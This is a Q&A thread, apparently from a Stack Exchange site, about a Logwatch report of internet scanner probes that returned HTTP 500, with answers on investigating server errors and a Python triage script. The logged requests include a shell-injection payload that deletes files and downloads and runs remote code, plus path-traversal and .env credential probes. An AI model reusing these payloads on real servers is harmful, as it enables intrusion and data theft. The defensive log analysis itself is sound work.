0

Logwatch shows those attacks giving a 500. Given that 500 is an internal server error, does that mean I need to examine further or dismiss?

421 (undefined)
   /: 4 Time(s)
500 Internal Server Error
   /: 1131 Time(s)
   /robots.txt: 67 Time(s)
   /.env: 11 Time(s)
   /ab2h: 4 Time(s)
   /?XDEBUG_SESSION_START=phpstorm: 3 Time(s)
   /ab2g: 3 Time(s)
   /actuator/gateway/routes: 3 Time(s)
   /actuator/health: 2 Time(s)
   /boaform/admin/formLogin: 2 Time(s)
   /owa/auth/logon.aspx: 2 Time(s)
   /solr/: 2 Time(s)
   /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s)
   /.DS_Store: 1 Time(s)
   /.json: 1 Time(s)
   //: 1 Time(s)
   /2018/wp-includes/wlwmanifest.xml: 1 Time(s)
   /2019/wp-includes/wlwmanifest.xml: 1 Time(s)
   /?s=/Index/\\think\\app/invokefunction&fun ... s[1][]=ymd464ye: 1 Time(s)
   /_ignition/execute-solution: 1 Time(s)
   /about.cgi: 1 Time(s)
   /admin/.env: 1 Time(s)
   /api/.env: 1 Time(s)
   /api/index/getline?id=130: 1 Time(s)
   /app/.env: 1 Time(s)
   /app/config/.env: 1 Time(s)
   /apps/.env: 1 Time(s)
   /audio/.env: 1 Time(s)
   /backend/.env: 1 Time(s)
   /base/.env: 1 Time(s)
   /blog/.env: 1 Time(s)
   /blog/wp-includes/wlwmanifest.xml: 1 Time(s)
   /cms/wp-includes/wlwmanifest.xml: 1 Time(s)
   /conf/.env: 1 Time(s)
   /config.json: 1 Time(s)
   /config/getuser?index=0: 1 Time(s)
   /core/.env: 1 Time(s)
   /crm/.env: 1 Time(s)
   /database/.env: 1 Time(s)
   /datenschutz/: 1 Time(s)
   /ecp/Current/exporttool/microsoft.exchange ... ool.application: 1 Time(s)
   /<meineip>/.env: 1 Time(s)
   /idx_config/: 1 Time(s)
   /jenkins/login: 1 Time(s)
   /laravel/.env: 1 Time(s)
   /library/.env: 1 Time(s)
   /local/.env: 1 Time(s)
   /login: 1 Time(s)
   /m/index.php?id=298: 1 Time(s)
   /m/index.php?id=590: 1 Time(s)
   /manager/html: 1 Time(s)
   /media/wp-includes/wlwmanifest.xml: 1 Time(s)
   /new/.env: 1 Time(s)
   /news/wp-includes/wlwmanifest.xml: 1 Time(s)
   /newsite/.env: 1 Time(s)
   /old/.env: 1 Time(s)
   /owa/auth/logon.aspx?url=https...: 1 Time(s)
   /owa/auth/x.js: 1 Time(s)
   /phpmyadmin/index.php: 1 Time(s)
   /protected/.env: 1 Time(s)
   /public/.env: 1 Time(s)
   /push.html: 1 Time(s)
   /remote/fgt_lang?lang=/../../../..//////// ... lvpn_websession: 1 Time(s)
   /script: 1 Time(s)
   /setup.cgi?next_file=netgear.cfg&todo=sysc ... ntsetting.htm=1: 1 Time(s)
   /shell?cd+/tmp;rm+-rf+*;wget+networkmappin ... ws;sh+/tmp/jaws: 1 Time(s)
   /shop/wp-includes/wlwmanifest.xml: 1 Time(s)
   /site/wp-includes/wlwmanifest.xml: 1 Time(s)
   /sites/all/libraries/mailchimp/.env: 1 Time(s)
   /sito/wp-includes/wlwmanifest.xml: 1 Time(s)
   /src/.env: 1 Time(s)
   /storage/.env: 1 Time(s)
   /telescope/requests: 1 Time(s)
   /test/wp-includes/wlwmanifest.xml: 1 Time(s)
   /vendor/.env: 1 Time(s)
   /vendor/laravel/.env: 1 Time(s)
   /version: 1 Time(s)
   /web/wp-includes/wlwmanifest.xml: 1 Time(s)
   /website/wp-includes/wlwmanifest.xml: 1 Time(s)
   /wordpress/wp-includes/wlwmanifest.xml: 1 Time(s)
   /wp-admin/.env: 1 Time(s)
   /wp-content/.env: 1 Time(s)
   /wp-includes/wlwmanifest.xml: 1 Time(s)
   /wp/wp-includes/wlwmanifest.xml: 1 Time(s)
   /wp1/wp-includes/wlwmanifest.xml: 1 Time(s)
   /wp2/wp-includes/wlwmanifest.xml: 1 Time(s)
   /www/.env: 1 Time(s)
   host64.ru:443: 1 Time(s)
   http://<meineip>:80/mysql/scripts/setup.php: 1 Time(s)
   http://<meineip>:80/pma/scripts/setup.php: 1 Time(s)
   http://host64.ru/rb/getip.php?Z76yxcyxc: 1 Time(s)
   mkzaim.ru:443: 1 Time(s)
1
  • You call these “attacks”. No, it’s just an attempt to access something. For example the .DS_STORE which means a Mac is trying to access a directory and wants to know where to display file icons. robots.txt is an attempt to be nice. The one with multiple /.. is highly suspicious.
    – gnasher729
    Commented Mar 1, 2023 at 11:55

2 Answers

1

5xx errors mean your backend/software/app has misbehaved/crashed.

Yes, you should investigate and solve those issues 100% of the time.

Those errors should never happen in well-designed systems (that is the design goal). Anything less means your systems might have compromising vulnerabilities.

If I can get your app/service/backend to generate 5xx errors, that is a form of denial of service. That can be a serious problem. Often 5xx errors are the result of software exceptions (the language feature). Those types of errors are CPU intensive, result in process restarts, fill/consume application logs, disk space and/or network bandwidth, and more possibilities.

Sometimes 5xx errors are the result of overloaded systems, failed networking, out-of-resource issues, etc.

You will not know unless you investigate. Always perform postmortem analysis.

0

Given that 500 is an internal server error, does that mean I need to examine further or dismiss?

Yes and no. This error is too generic. It might be the default reaction of your server or it might be a sign of a larger problem.

You need to study your specific server configuration to find out all the cases in which the error might be triggered and to determine if this is a problem. While doing this it might be useful to change the setup of your server to give more meaningful responses (like 404 not found etc) in most of these situations, so that analyzing the logs will get easier for you in the future.

2
  • How can this process be automated? Commented Oct 1, 2022 at 11:43
  • 1
    @Zurechtweiser: There is no automation possible based on the given information - which basically consists only of the logs but of no information about server and setup. The errors can come from anywhere - server configuration, reverse proxies backend ... . Before being able to automate anything you first need to understand your setup. Also, please stick with English in your comments so that others can understand these too. Commented Oct 1, 2022 at 11:57
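
A first-pass triage of a Logwatch status summary like the one in the question, added here as an example and not part of the original posts: it checks whether ordinary paths fail with 500 as well, which points at the server or proxy setup rather than at individual probes. The `BASELINE` path set and the verdict labels are assumptions; the sample lines are an excerpt of the report quoted in the question.

```python
import re
from collections import defaultdict

# Excerpt of the Logwatch report quoted in the question (counts as posted).
REPORT = """\
421 (undefined)
   /: 4 Time(s)
500 Internal Server Error
   /: 1131 Time(s)
   /robots.txt: 67 Time(s)
   /.env: 11 Time(s)
   /actuator/health: 2 Time(s)
   /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s)
   /wp-includes/wlwmanifest.xml: 1 Time(s)
"""

# Assumption: paths that ordinary clients and crawlers request; adjust per site.
BASELINE = {"/", "/robots.txt", "/favicon.ico"}

STATUS_RE = re.compile(r"^(\d{3}) ")                    # "500 Internal Server Error"
ENTRY_RE = re.compile(r"^\s+(.+): (\d+) Time\(s\)$")    # "   /path: 3 Time(s)"

def parse_logwatch(text):
    """Return {status: {path: count}} from a Logwatch httpd status section."""
    out, status = defaultdict(dict), None
    for line in text.splitlines():
        m = STATUS_RE.match(line)
        if m:
            status = int(m.group(1))
            continue
        m = ENTRY_RE.match(line)
        if m and status is not None:
            out[status][m.group(1)] = int(m.group(2))
    return dict(out)

def triage_5xx(by_status, status=500):
    """Count hits on baseline vs. other paths and label the pattern."""
    hits = by_status.get(status, {})
    base = sum(n for p, n in hits.items() if p in BASELINE)
    other = sum(n for p, n in hits.items() if p not in BASELINE)
    if base and other:
        verdict = "blanket"      # ordinary requests fail too: check server/proxy setup
    elif other:
        verdict = "selective"    # only unusual paths fail: read the app error log per path
    else:
        verdict = "no-unusual-paths"
    return {"baseline_hits": base, "other_hits": other, "verdict": verdict}

if __name__ == "__main__":
    print(triage_5xx(parse_logwatch(REPORT)))
```

The label is only a hint about where to look first; the server's own error log for the same time window is what shows why each 500 was returned.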
